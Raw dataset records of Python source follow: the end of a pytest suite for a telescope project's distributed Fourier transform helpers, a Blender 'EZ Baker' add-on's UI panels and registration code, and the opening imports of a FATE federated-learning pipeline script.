0.499),\n ],\n)\ndef test_coordinates(n, minimum, maximum):\n \"\"\"\n Test values are chosen to illustrate how min and max\n values in the array change depending on the array length.\n \"\"\"\n result = coordinates(n)\n\n assert len(result) == n\n assert result[0].round(8) == round(minimum, 8)\n assert result[n // 2] == 0.0\n assert result[-1].round(8) == round(maximum, 8)\n\n\n@pytest.mark.parametrize(\n \"dims, axis, expected_shape\",\n [\n (0, 0, (10, 10)),\n (1, 0, (10, 10)),\n (2, 0, (10, 1, 10)),\n (3, 0, (10, 1, 1, 10)),\n (4, 0, (10, 1, 1, 1, 10)),\n (0, 1, (10, 10)),\n (1, 1, (1, 10, 10)),\n (2, 1, (1, 10, 10)),\n (3, 1, (1, 10, 1, 10)),\n (4, 1, (1, 10, 1, 1, 10)),\n (0, 2, (10, 10)),\n (1, 2, (1, 10, 10)),\n (2, 2, (1, 1, 10, 10)),\n (3, 2, (1, 1, 10, 10)),\n (4, 2, (1, 1, 10, 1, 10)),\n (0, 3, (10, 10)),\n (1, 3, (1, 10, 10)),\n (2, 3, (1, 1, 10, 10)),\n (3, 3, (1, 1, 1, 10, 10)),\n (4, 3, (1, 1, 1, 10, 10)),\n (5, 3, (1, 1, 1, 10, 1, 10)),\n (0, 3, (10, 10)),\n ],\n)\ndef test_broadcast(dims, axis, expected_shape):\n \"\"\"\n Provide a large set of cases to indicate how\n the shape of the input array changes\n with input dims-axis combinations.\n \"\"\"\n array = numpy.ones((10, 10))\n result = broadcast(array, dims, axis)\n assert result.shape == expected_shape\n\n\n@pytest.mark.parametrize(\n \"dims, axis\",\n [\n (1, (0, 1)),\n (2, (0, 2)),\n (3, (1, 1)),\n ((2, 4), 4),\n (\"str\", (3, 4)),\n ],\n)\ndef test_broadcast_raises_error(dims, axis):\n \"\"\"\n ValueError is raised when either dims or axis is not an integer.\n See docstring and test for create_slice.\n \"\"\"\n with pytest.raises(ValueError):\n broadcast(numpy.ones((10, 10)), dims, axis)\n\n\n@pytest.mark.parametrize(\n \"dims, axis, expected_tuple\",\n [\n (0, 0, ()), # if dims is 0, result is always an empty tuple\n (1, 0, (6,)), # range(1) --> 0, which equals to axis -> use axis_value\n (\n 1,\n 1,\n (2,),\n ), # range(1) --> 0, which doesn't equal to axis -> use fill_value\n (3, 2, (2, 2, 6)), # axis=2 (3rd value in tuple) is axis_val\n (6, 3, (2, 2, 2, 6, 2, 2)),\n ],\n)\ndef test_create_slice(dims, axis, expected_tuple):\n \"\"\"\n Test create_slice. See parametrize list for more info.\n \"\"\"\n fill_val = 2\n axis_val = 6\n result = create_slice(fill_val, axis_val, dims, axis)\n assert result == expected_tuple\n\n\n@pytest.mark.parametrize(\n \"dims, axis\",\n [(5, (0, 2)), ((2, 3), 4), ((2, 2), (0, 1)), (\"bla\", 5), (3, \"bla\")],\n)\ndef test_create_slice_raises_error(dims, axis):\n \"\"\"\n Only integers of dims and axis are allowed.\n While axis could be other things too, that would not have an\n effect, since in that case axis would never be in range(dims),\n hence we do not allow it in the code.\n \"\"\"\n with pytest.raises(ValueError):\n create_slice(2, 6, dims, axis)\n\n\n@pytest.mark.parametrize(\"use_dask\", [False, True])\ndef test_ith_subgrid_facet_element_axis_int(use_dask):\n \"\"\"\n Input array is one dimensional, i.e. the axis argument is an integer.\n Steps the code takes with example data in test:\n * input array: [13, 44, 12, 23, 33, 1, 53, 1234, 332, 54, 9]\n * roll by 2: [54, 9, 13, 44, 12, 23, 33, 1, 53, 1234, 332]\n * extract mid (5): [44, 12, 23, 33, 1]\n * masked: [0, 0, 23, 33, 1] ==> expected result\n \"\"\"\n image = numpy.array([13, 44, 12, 23, 33, 1, 53, 1234, 332, 54, 9])\n offset = 2\n true_size = 5\n mask = [0, 0, 1, 1, 1] # length of mask = true_size\n\n result = ith_subgrid_facet_element(\n image, offset, true_size, mask, axis=0, use_dask=use_dask, nout=1\n )\n if use_dask:\n result = dask.compute(result, sync=True)\n\n assert (result == numpy.array([0, 0, 23, 33, 1])).all()\n\n\n@pytest.mark.parametrize(\"use_dask\", [False, True])\ndef test_ith_subgrid_facet_element_axis_tuple(use_dask):\n \"\"\"\n Input array is two dimensional, i.e. the axis argument\n is a tuple of length two.\n\n Steps the code takes with example data in test:\n * input array:\n [[1, 44, 12, 23, 33],\n [13, 53, 1234, 332, 54],\n [123, -53, 32, -55, -452]]\n * roll by 1 along axis=0 and 3 along axis=1:\n [[32, -55, -452, 123, -53],\n [12, 23, 33, 1, 44],\n [332, 54, 13, 53, 1234]]\n * extract mid (5):\n [[-55, -452],\n [23, 33]]\n * masked:\n [[0, 0],\n [0, 33]] ==> expected result\n \"\"\"\n image = numpy.array(\n [\n [1, 44, 12, 23, 33],\n [13, 53, 1234, 332, 54],\n [123, -53, 32, -55, -452],\n ]\n )\n offset = (1, 3)\n true_size = 2\n mask = numpy.array([[0, 0], [0, 1]])\n\n result = ith_subgrid_facet_element(\n image, offset, true_size, mask, axis=(0, 1), use_dask=use_dask, nout=1\n )\n if use_dask:\n result = dask.compute(result, sync=True)\n\n assert (result == numpy.array([[0, 0], [0, 33]])).all()\n\n\n# pylint: disable=too-many-locals\ndef test_roll_and_extract_mid():\n \"\"\"\n For testing the roll+extract mid slice method\n \"\"\"\n N = 1 * 1024\n yB_size = 118\n test_data = numpy.arange(0, N * N).reshape(N, N)\n ch = yB_size\n offset_i = yB_size * numpy.arange(int(numpy.ceil(N / yB_size)))\n\n res = []\n for offx in offset_i:\n for offy in offset_i:\n test_roll = numpy.roll(test_data, (-offx, -offy), axis=(0, 1))\n true = extract_mid(extract_mid(test_roll, ch, 0), ch, 1)\n slicex, slicey = roll_and_extract_mid(\n N, offx, ch\n ), roll_and_extract_mid(N, offy, ch)\n test = numpy.empty((ch, ch), dtype=test_data.dtype)\n if len(slicex) <= len(slicey):\n iter_what1 = slicex\n iter_what2 = slicey\n else:\n iter_what1 = slicey\n iter_what2 = slicex\n\n pointx = [0]\n for sl in slicex:\n dt = sl.stop - sl.start\n pointx.append(dt + pointx[-1])\n\n pointy = [0]\n for sl in slicey:\n dt = sl.stop - sl.start\n pointy.append(dt + pointy[-1])\n\n for i0 in range(len(iter_what1)):\n for i1 in range(len(iter_what2)):\n if len(slicex) <= len(slicey):\n slice_block_x = slice(pointx[i0], pointx[i0 + 1])\n slice_block_y = slice(pointy[i1], pointy[i1 + 1])\n test[slice_block_x, slice_block_y] = test_data[\n slicex[i0], slicey[i1]\n ]\n else:\n slice_block_x = slice(pointx[i1], pointx[i1 + 1])\n slice_block_y = slice(pointy[i0], pointy[i0 + 1])\n test[slice_block_x, slice_block_y] = test_data[\n slicex[i1], slicey[i0]\n ]\n res.append((test == true).all())\n assert numpy.array(res).all()\n\n\ndef test_roll_and_extract_mid_axis():\n \"\"\"\n For testing the roll+extract mid slice method with a 2d data\n \"\"\"\n\n data = numpy.array(\n [\n [0, 1, 2, 3, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24],\n ]\n )\n\n offset = 3 # Trigger edge position\n true_usable_size = 2\n axis = 0\n true_block_data = numpy.array([[20, 21, 22, 23, 24], [0, 1, 2, 3, 4]])\n block_data = roll_and_extract_mid_axis(\n data, offset, true_usable_size, axis\n )\n assert (block_data == true_block_data).all()\n\n axis = 1 # Test 1th axis\n block_data = roll_and_extract_mid_axis(\n data, offset, true_usable_size, axis\n )\n true_block_data = numpy.array(\n [[4, 0], [9, 5], [14, 10], [19, 15], [24, 20]]\n )\n assert (block_data == true_block_data).all()\n\n\ndef test_make_facet_from_sources():\n \"\"\"\n Simple unit tests for make_facet_from_sources\n \"\"\"\n\n # Test shapes\n assert make_facet_from_sources([], 1, 1, [0]).shape == (1,)\n assert make_facet_from_sources([], 1, 2, [0]).shape == (2,)\n assert make_facet_from_sources([], 1, 1, [0, 0]).shape == (1, 1)\n assert make_facet_from_sources([], 1, 1, [0, 0, 0]).shape == (1, 1, 1)\n\n # Test a bunch of cases for small images\n def mffs(*xs):\n return list(make_facet_from_sources(*xs))\n\n assert mffs([], 1, 1, [0]) == [0]\n assert mffs([(1, 0)], 1, 1, [0]) == [1]\n assert mffs([(1, 2)], 1, 1, [0]) == [1]\n assert mffs([(1, 0)], 2, 1, [0]) == [1]\n assert mffs([(1, 1)], 2, 1, [0]) == [0]\n assert mffs([(1, 2)], 2, 1, [0]) == [1]\n assert mffs([(1, 0)], 2, 2, [0]) == [0, 1]\n assert mffs([(1, 1)], 2, 2, [0]) == [1, 0]\n assert mffs([(1, 2)], 2, 2, [0]) == [0, 1]\n assert mffs([(1, 0), (2, 1)], 2, 2, [0]) == [2, 1]\n assert mffs([(1, 0), (2, 3)], 2, 2, [0]) == [2, 1]\n assert mffs([(1, 0)], 2, 2, [1]) == [1, 0]\n assert mffs([(1, 1)], 2, 2, [1]) == [0, 1]\n assert mffs([(1, 2)], 2, 2, [1]) == [1, 0]\n assert mffs([(1, 0)], 2, 2, [-1]) == [1, 0]\n assert mffs([(1, 1)], 2, 2, [-1]) == [0, 1]\n assert mffs([(1, 2)], 2, 2, [-1]) == [1, 0]\n assert mffs([(1, 0)], 2, 2, [0], [[1, 0]]) == [0, 0]\n assert mffs([(1, 1)], 2, 2, [0], [[1, 0]]) == [1, 0]\n assert mffs([(1, 2)], 2, 2, [0], [[1, 0]]) == [0, 0]\n assert mffs([(1, 0)], 2, 2, [0], [[0, 1]]) == [0, 1]\n assert mffs([(1, 1)], 2, 2, [0], [[0, 1]]) == [0, 0]\n assert mffs([(1, 2)], 2, 2, [0], [[0, 1]]) == [0, 1]\n assert mffs([(1, 0)], 2, 2, [-1], [[1, 0]]) == [1, 0]\n assert mffs([(1, 1)], 2, 2, [-1], [[1, 0]]) == [0, 0]\n assert mffs([(1, 2)], 2, 2, [-1], [[1, 0]]) == [1, 0]\n assert mffs([(1, 0)], 2, 2, [1], [[0, 1]]) == [0, 0]\n assert mffs([(1, 1)], 2, 2, [1], [[0, 1]]) == [0, 1]\n assert mffs([(1, 2)], 2, 2, [1], [[0, 1]]) == [0, 0]\n\n\ndef test_make_subgrid_from_sources():\n \"\"\"\n Simple unit tests for make_subgrid_from_sources\n \"\"\"\n\n # Test shapes\n assert make_subgrid_from_sources([], 1, 1, [0]).shape == (1,)\n assert make_subgrid_from_sources([], 1, 2, [0]).shape == (2,)\n assert make_subgrid_from_sources([], 1, 1, [0, 0]).shape == (1, 1)\n assert make_subgrid_from_sources([], 1, 1, [0, 0, 0]).shape == (1, 1, 1)\n\n # Test a bunch of cases for small images\n def msfs(*xs):\n return pytest.approx(list(make_subgrid_from_sources(*xs)))\n\n assert msfs([(1, 0)], 1, 1, [0]) == [1]\n assert msfs([(1, 2)], 1, 1, [0]) == [1]\n assert msfs([(1, 0)], 2, 1, [0]) == [0.5]\n assert msfs([(1, 1)], 2, 1, [0]) == [0.5]\n assert msfs([(1, 2)], 2, 1, [0]) == [0.5]\n assert msfs([(1, 0)], 2, 1, [1]) == [0.5]\n assert msfs([(1, 1)], 2, 1, [1]) == [-0.5]\n assert msfs([(1, 2)], 2, 1, [1]) == [0.5]\n assert msfs([(1, 0)], 2, 2, [0]) == [0.5, 0.5]\n assert msfs([(1, 1)], 2, 2, [0]) == [-0.5, 0.5]\n assert msfs([(1, 2)], 2, 2, [0]) == [0.5, 0.5]\n assert msfs([(1, 0)], 2, 2, [1]) == [0.5, 0.5]\n assert msfs([(1, 1)], 2, 2, [1]) == [0.5, -0.5]\n assert msfs([(1, 2)], 2, 2, [1]) == [0.5, 0.5]\n assert msfs([(1, 0)], 2, 2, [-1]) == [0.5, 0.5]\n assert msfs([(1, 1)], 2, 2, [-1]) == [0.5, -0.5]\n assert msfs([(1, 2)], 2, 2, [-1]) == [0.5, 0.5]\n assert msfs([(1, 0)], 2, 2, [0], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 1)], 2, 2, [0], [[1, 0]]) == [-0.5, 0]\n assert msfs([(1, 2)], 2, 2, [0], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 0)], 2, 2, [0], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 1)], 2, 2, [0], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 2)], 2, 2, [0], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 0)], 2, 2, [-1], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 1)], 2, 2, [-1], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 2)], 2, 2, [-1], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 0)], 2, 2, [1], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 1)], 2, 2, [1], [[0, 1]]) == [0, -0.5]\n assert msfs([(1, 2)], 2, 2, [1], [[0, 1]]) == [0, 0.5]\n\n\ndef test_make_facet_subgrid_from_sources_1d():\n \"\"\"\n Test facet / subgrid generation from sources - thorough 1D version\n \"\"\"\n\n source_lists = [\n [],\n [(1, 0)],\n [(10, 0)],\n [(1, 0), (2, 0)],\n [(1, 1)],\n [(1, -4)],\n [(1, 10000)],\n [(1, -10000)],\n [(1, 10), (1, -20), (3, 2)],\n ]\n\n for sources, image_size, subgrid_offset, facet_offset in itertools.product(\n source_lists, [4, 8, 16, 32], [0, 5, -7], [0, 2, -3]\n ):\n\n # Generate \"sub\" grid and facet. We choose image and subgrid\n # size to be equal to entire image size so the results should\n # be precisely the FFT of each other (at an offset)\n subgrid = make_subgrid_from_sources(\n sources, image_size, image_size, [subgrid_offset]\n )\n facet = make_facet_from_sources(\n sources, image_size, image_size, [facet_offset]\n )\n\n # Sanity check\n assert numpy.sum(facet) == pytest.approx(\n sum(source[0] for source in sources)\n )\n\n # Roll to remove offsets\n subgrid = numpy.roll(subgrid, subgrid_offset)\n facet = numpy.roll(facet, facet_offset)\n\n # Check equal-ness and normalisation\n numpy.testing.assert_array_almost_equal(fft(subgrid, axis=0), facet)\n if sources == [(1, 0)]:\n numpy.testing.assert_array_almost_equal(subgrid, 1 / image_size)\n\n\ndef test_make_facet_subgrid_from_sources_2d():\n \"\"\"\n Test facet / subgrid generation from sources - less thorough 2D\n version (might get expensive)\n \"\"\"\n\n source_lists = [\n [],\n [(1, 0, 0)],\n [(10, 0, 0)],\n [(1, 0, 0), (2, 0, 0)],\n [(1, 1, 0)],\n [(1, -4, 0)],\n ]\n facet_sg_offsets = numpy.array([[0, 0], [0, 3], [0, -4], [2, 0], [1, 0]])\n\n for sources, image_size, subgrid_offset, facet_offset in itertools.product(\n source_lists, [4, 8, 16], facet_sg_offsets, facet_sg_offsets\n ):\n\n # Generate \"sub\" grid and facet. We choose image and subgrid\n # size to be equal to entire image size so the results should\n # be precisely the FFT of each other (at an offset)\n subgrid = make_subgrid_from_sources(\n sources, image_size, image_size, subgrid_offset\n )\n facet = make_facet_from_sources(\n sources, image_size, image_size, facet_offset\n )\n\n # Sanity check\n assert numpy.sum(facet) == pytest.approx(\n sum(source[0] for source in sources)\n )\n\n # Roll to remove offsets\n subgrid = numpy.roll(subgrid, subgrid_offset, axis=(0, 1))\n facet = numpy.roll(facet, facet_offset, axis=(0, 1))\n\n # Check equal-ness and normalisation\n numpy.testing.assert_array_almost_equal(\n fft(fft(subgrid, axis=0), axis=1), facet\n )\n if sources == [(1, 0, 0)]:\n numpy.testing.assert_array_almost_equal(\n subgrid, 1 / image_size / image_size\n )\n\n\ndef test_make_subgrid_and_facet_from_sources_function():\n \"\"\"\n Test the function make_facet_and_subgrid_from_sources\n \"\"\"\n\n image_size = 1024\n xA_size = 188\n yB_size = 256\n\n TEST_PARAMS = {\n \"W\": 13.25,\n \"fov\": 0.75,\n \"N\": image_size,\n \"Nx\": 4,\n \"yB_size\": yB_size,\n \"yN_size\": 320,\n \"yP_size\": 512,\n \"xA_size\": xA_size,\n \"xM_size\": 256,\n }\n\n base_arrays = BaseArrays(**TEST_PARAMS)\n\n sources = [(1, 0, 0)]\n\n subgrid, facet = make_subgrid_and_facet_from_sources(\n sources, base_arrays, use_dask=False\n )\n\n # Testing the shape\n assert subgrid.shape == (\n base_arrays.nsubgrid,\n base_arrays.nsubgrid,\n xA_size,\n xA_size,\n )\n assert facet.shape == (\n base_arrays.nfacet,\n base_arrays.nfacet,\n yB_size,\n yB_size,\n )\n\n # Testing the data\n assert abs(numpy.sum(facet[0, 0])) == 1.0\n\n subgrid = numpy.roll(subgrid, [0, 0], axis=(0, 1))\n ft_subgrid_0 = fft(fft(subgrid[0, 0], axis=0), axis=1)\n assert numpy.isclose(\n abs(numpy.sum(ft_subgrid_0)),\n 1.0 / (image_size / xA_size) ** 2,\n rtol=1e-13,\n )\n","repo_name":"ska-telescope/ska-sdp-distributed-fourier-transform","sub_path":"tests/test_fourier_algorithm.py","file_name":"test_fourier_algorithm.py","file_ext":"py","file_size_in_byte":25508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44686157578","text":"import bpy\nimport textwrap\n\nfrom bpy.props import (\n StringProperty,\n BoolProperty,\n IntProperty,\n FloatProperty,\n FloatVectorProperty,\n EnumProperty,\n PointerProperty,\n)\n\nfrom .settings import mode_group_types, devices_enum\nfrom . import outputs\nfrom . import baker\nfrom . import bake_group\nfrom . import operators\nfrom . import devices\nfrom . import handlers\nfrom .addon_updater import ops\n\nopen_folder_icon = 'FILE_FOLDER'\nif bpy.app.version >= (2, 83, 0):\n open_folder_icon = 'FOLDER_REDIRECT'\n\nis_baking = False\n\n\nclass EZB_preview_group_object(bpy.types.PropertyGroup):\n name: bpy.props.StringProperty()\n cage: bpy.props.StringProperty()\n\n\nclass EZB_Settings(bpy.types.PropertyGroup):\n bakers: bpy.props.CollectionProperty(type=baker.EZB_Baker)\n baker_index: bpy.props.IntProperty(update=handlers.update_group_objects_on_index_change)\n\n suffix_high: bpy.props.StringProperty(default=\"_high\")\n suffix_low: bpy.props.StringProperty(default=\"_low\")\n suffix_cage: bpy.props.StringProperty(default=\"_cage\")\n\n save_type: bpy.props.EnumProperty(items=[\n ('PACK', 'Internally', 'Pack images inside the .blend file'),\n ('EXTERNAL', 'Externally', 'Save images to an external file')\n ])\n\n preview_group_objects_high: bpy.props.CollectionProperty(type=EZB_preview_group_object)\n preview_group_objects_low: bpy.props.CollectionProperty(type=EZB_preview_group_object)\n\n preview_group_objects_high_index: bpy.props.IntProperty()\n preview_group_objects_low_index: bpy.props.IntProperty()\n\n\nclass EZB_PT_core_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_core_panel\"\n bl_label = \"General Settings\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n bl_options = {'DEFAULT_CLOSED'}\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=False)\n col.use_property_split = True\n col.use_property_decorate = False # No animation.\n\n col.prop(context.scene.EZB_Settings, \"suffix_high\", text=\"High\")\n col.prop(context.scene.EZB_Settings, \"suffix_low\", text=\"Low\")\n col.prop(context.scene.EZB_Settings, \"suffix_cage\", text=\"Cage\")\n\n\nclass EZB_UL_preview_group_objects(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n sub_row = layout.row()\n sub_row.operator('ezb.select_object', text='', icon='RESTRICT_SELECT_OFF').name = item.name\n sub_row.label(text=item.name, icon='MESH_CUBE')\n\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n bake_group = baker.bake_groups[baker.bake_group_index]\n\n if bake_group.mode_group == 'CUSTOM':\n op = sub_row.operator('ezb.remove_custom_object', text='', icon='REMOVE')\n\n op.scene = context.scene.name\n op.datapath = bake_group.path_from_id()\n op.is_high = True\n op.index = index\n\n\nclass EZB_UL_preview_group_objects_low(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n sub_row = layout.row()\n sub_row.operator('ezb.select_object', text='', icon='RESTRICT_SELECT_OFF').name = item.name\n sub_row.label(text=item.name, icon='MESH_CUBE')\n if item.cage:\n sub_row.operator('ezb.select_object', text='', icon='SELECT_SET').name = item.cage\n else:\n sub_row.operator('ezb.create_custom_cage', text='', icon='ADD').name = item.name\n\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n bake_group = baker.bake_groups[baker.bake_group_index]\n\n if bake_group.mode_group == 'CUSTOM':\n op = sub_row.operator('ezb.remove_custom_object', text='', icon='REMOVE')\n\n op.scene = context.scene.name\n op.datapath = bake_group.path_from_id()\n op.is_high = False\n op.index = index\n\n\nclass EZB_UL_bakers(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n row = layout.row()\n row.prop(item, 'key', text='', icon=next(x[3] for x in devices_enum if x[0] == item.device_type), emboss=False)\n\n\nclass EZB_UL_bake_groups(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n row = layout.row()\n icon = next(x[3] for x in mode_group_types if x[0] == item.mode_group)\n\n selected = any(y.select_get() for y in item.objects_high) or any(y.select_get() for y in item.objects_low)\n selected_icon = 'RESTRICT_SELECT_ON' if not selected else 'RESTRICT_SELECT_OFF'\n\n row.label(text='', icon=selected_icon)\n row.prop(item, 'key', text='', icon=icon, emboss=False)\n\n high_objs = item.objects_high\n low_objs = item.objects_low\n if not data.child_device.use_low_to_low:\n row.operator('ezb.show_high_objects', text='High: {}'.format(len(high_objs)), emboss=False).index = index\n row.operator('ezb.show_low_objects', text='Low: {}'.format(len(low_objs)), emboss=False).index = index\n\n if not data.child_device.use_low_to_low:\n row.prop(\n item,\n 'preview_cage',\n text='cage',\n icon=\"HIDE_OFF\" if item.preview_cage else \"HIDE_ON\",\n icon_only=True,\n emboss=False\n )\n\n\nclass EZB_PT_baker_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_baker_panel\"\n bl_label = \"Bakers\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n\n def draw(self, context):\n ops.check_for_update_background()\n ops.update_notice_box_ui(self, context)\n\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n\n bakers = [x for x in ezb_settings.bakers]\n\n main_col = layout.column(align=True)\n row = main_col.row(align=True)\n\n row.template_list(\"EZB_UL_bakers\", \"\", ezb_settings, \"bakers\", ezb_settings, \"baker_index\", rows=2)\n col = row.column(align=True)\n col.operator('ezb.new_baker', text='', icon='ADD')\n col.operator('ezb.remove_baker', text='', icon='REMOVE')\n\n row = main_col.split(factor=0.8, align=True)\n # split=row.split(factor=0.75, align=True)\n row.scale_y = 1.5\n\n baker = None\n if (context.scene.EZB_Settings.baker_index < len(context.scene.EZB_Settings.bakers) and len(context.scene.EZB_Settings.bakers) > 0):\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n rub_row = row.row(align=True)\n bake_button_text = 'Bake'\n if baker and baker.is_baking:\n rub_row.operator('ezb.cancel_bake', text='', icon='X')\n bake_button_text = baker.child_device.show_progress()\n bake_op = rub_row.operator('ezb.bake', text=bake_button_text, icon='IMPORT')\n\n path = ''\n row = row.row(align=True)\n row.enabled = False\n if baker:\n row.enabled = bool(baker.path)\n path = baker.path\n\n row.operator(\"wm.path_open\", text=\"Open\", icon=open_folder_icon).filepath = path\n\n if baker and baker.is_baking:\n layout.label(text=f'Baking: {baker.baking_map_name}...')\n\n row = layout.row()\n row.enabled = False\n\n if False:\n tooltip = operators.EZB_OT_bake.description(context, bake_op)\n if tooltip != 'Bake':\n text_wrap = textwrap.TextWrapper(width=50) # 50 = maximum length\n text_list = text_wrap.wrap(text=tooltip)\n\n # Now in the panel:\n for text in text_list:\n row = layout.row(align=True)\n row.alignment = 'CENTER'\n row.label(text=text)\n\n\nclass EZB_PT_baker_settings_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_baker_settings_panel\"\n bl_label = \"Baker Settings\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n #bl_options = {'DEFAULT_CLOSED'}\n bl_parent_id = \"EZB_PT_baker_panel\"\n\n def draw(self, context):\n layout = self.layout\n ezb_settings = context.scene.EZB_Settings\n bakers = [x for x in ezb_settings.bakers]\n baker_index = context.scene.EZB_Settings.baker_index\n\n if not(context.scene.EZB_Settings.baker_index < len(bakers) and len(bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n layout.enabled = not baker.is_baking\n\n col = layout.column(align=False)\n\n baker.draw(col, context)\n\n\nclass EZB_PT_bake_groups_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_bake_groups_panel\"\n bl_label = \"Bake Groups\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n\n def draw(self, context):\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n if not(context.scene.EZB_Settings.baker_index < len(ezb_settings.bakers) and len(ezb_settings.bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n\n # layout.enabled = not baker.is_baking\n\n col = layout.column(align=True)\n col.template_list(\"EZB_UL_bake_groups\", \"\", baker, \"bake_groups\", baker, \"bake_group_index\", rows=2)\n row2 = col.row(align=True)\n row2.operator_menu_enum('ezb.create_possible_bake_groups', 'gather_from', text='', icon='IMPORT')\n row2.operator_menu_enum('ezb.new_bake_group', 'name', text='Add Bake Group', icon='ADD')\n row2.operator('ezb.remove_bake_group', text='', icon='REMOVE')\n\n if len(baker.bake_groups) > baker.bake_group_index and baker.bake_group_index >= 0:\n bake_group = baker.bake_groups[baker.bake_group_index]\n if not baker.child_device.use_low_to_low:\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(\n bake_group,\n 'preview_cage',\n text='',\n icon=\"HIDE_OFF\" if bake_group.preview_cage else \"HIDE_ON\",\n icon_only=True,\n emboss=False\n )\n row.prop(bake_group, 'cage_displacement')\n row.operator('ezb.edit_bake_groups', text='', icon='SHADERFX')\n\n layout = layout.split(factor=0.5, align=True)\n column = layout.column()\n if bake_group.mode_group == 'CUSTOM':\n column.prop(bake_group, 'object_high', text='High')\n column.template_list(\n \"EZB_UL_preview_group_objects\",\n \"\",\n ezb_settings,\n \"preview_group_objects_high\",\n ezb_settings,\n \"preview_group_objects_high_index\",\n rows=2,\n )\n column = layout.column()\n if bake_group.mode_group == 'CUSTOM':\n column.prop(bake_group, 'object_low', text='Low')\n column.template_list(\n \"EZB_UL_preview_group_objects_low\",\n \"\",\n ezb_settings,\n \"preview_group_objects_low\",\n ezb_settings,\n \"preview_group_objects_low_index\",\n rows=2,\n )\n\n\nclass EZB_PT_maps_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_maps_panel\"\n bl_label = \"Maps\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n\n def draw(self, context):\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n if not(context.scene.EZB_Settings.baker_index < len(ezb_settings.bakers) and len(ezb_settings.bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n col = layout.column(align=True)\n col.operator_menu_enum('ezb.add_map', 'map', text='Add Map', icon='ADD')\n baker.draw_maps(col, context)\n\n\nclass EZB_PT_output_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_output_panel\"\n bl_label = \"Output\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n bl_options = {'DEFAULT_CLOSED'}\n\n def draw(self, context):\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n if not(context.scene.EZB_Settings.baker_index < len(ezb_settings.bakers) and len(ezb_settings.bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n\n if not baker.materials:\n layout.label(text='Bake in the \"Bakers\" panel to see the output images in this panel')\n return\n col = layout.column()\n for x in baker.materials:\n x.draw(col, context)\n\n\nclasses = [\n EZB_preview_group_object,\n EZB_Settings,\n EZB_UL_bakers,\n EZB_UL_bake_groups,\n EZB_PT_core_panel,\n EZB_PT_baker_panel,\n EZB_PT_baker_settings_panel,\n EZB_PT_bake_groups_panel,\n EZB_PT_maps_panel,\n EZB_PT_output_panel,\n EZB_UL_preview_group_objects,\n EZB_UL_preview_group_objects_low\n]\n\n\ndef register():\n outputs.register()\n operators.register()\n devices.register()\n bake_group.register()\n baker.register()\n\n from bpy.utils import register_class\n\n for cls in classes:\n register_class(cls)\n\n bpy.types.Scene.EZB_Settings = bpy.props.PointerProperty(type=EZB_Settings)\n\n handlers.register()\n\n\ndef unregister():\n from bpy.utils import unregister_class\n\n handlers.unregister()\n\n for cls in reversed(classes):\n unregister_class(cls)\n\n del bpy.types.Scene.EZB_Settings\n\n baker.unregister()\n bake_group.unregister()\n operators.unregister()\n devices.unregister()\n outputs.unregister()\n","repo_name":"eastinGroup/ez_baker","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26899065155","text":"import time\n\nimport click\n\nfrom flow_client.flow_cli.utils import cli_args\nfrom flow_client.flow_cli.utils.cli_utils import prettify\nfrom flow_sdk.client import FlowClient\n\nfrom pipeline.backend.pipeline import PipeLine\nfrom pipeline.component import (\n DataTransform, Evaluation, HeteroLR,\n HeteroSecureBoost, 